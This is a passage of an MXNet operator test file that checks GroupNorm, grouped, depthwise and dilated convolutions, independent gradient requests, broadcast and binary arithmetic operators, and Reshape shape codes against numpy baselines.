mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd, dtype=np_ograd.dtype)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1._simple_bind(default_context(), x=shape)
exe2 = y2._simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1._simple_bind(dev, x=shape)
exe2 = y2._simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
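# The independent-gradients test binds the same Convolution twice: once with a single
# grad_req shared by all inputs, and once with an independent grad_req ('null', 'write'
# or 'add') per input. Outputs must match, 'null' must leave the gradient buffer at
# zero, and wherever the requests coincide the gradients must agree.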
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv._bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv._bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
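# Data generators for the binary/broadcast operator checks below. gen_broadcast_data
# returns a pair of mutually broadcastable numpy arrays: the first 31 calls use the
# fixed shape pairs listed here, later calls draw a random shape (ndim 1-5, dims 1-5)
# and collapse a random subset of axes to 1 on each side.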
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
        # Generate random data with ndim between 1 and 5 and every shape dim between 1 and 5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
    d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
    d = gen_binary_data(dummy)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
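# Forward-check harness: bind the symbol with inputs 'a' and 'b', run forward, and
# compare against the numpy baseline (and optionally against the equivalent mx.nd
# function). On a mismatch it logs the offending elements, including the raw float64
# bytes in hex, before asserting.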
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
        #print("b: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
            logging.error('input b hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
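# Backward-check harness: feed a random output gradient, compute the baseline input
# gradients, and reduce (sum) them over any broadcast axes via reduce_op so they match
# the input shapes before comparing with the gradients from the bound executor.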
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
o = y.forward(is_train=True)
y.backward([mx.nd.array(out, dtype=o[0].dtype)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
        broadcast_max/min does not cross the boundary y=x, where the gradient is
        undefined at those singularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
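# Impulse-response check for (dilated) convolution: a single unit spike convolved with
# an all-ones kernel must produce an output that sums to prod(kernel_shape), and the
# input gradient must sum to the same value. A second pass re-runs the convolution with
# the kernel gradient added to a random kernel as a first-order sanity check.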
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net._bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net._bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
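# The parametrized cases below exercise Reshape's special shape codes: 0 keeps the
# corresponding input dim, -1 infers one dim from the remaining size, -2 copies the
# remaining input dims, -3 merges two consecutive input dims, and -4 splits one input
# dim into two (one entry may be -1). With reverse=True the codes are applied from the
# right.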
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
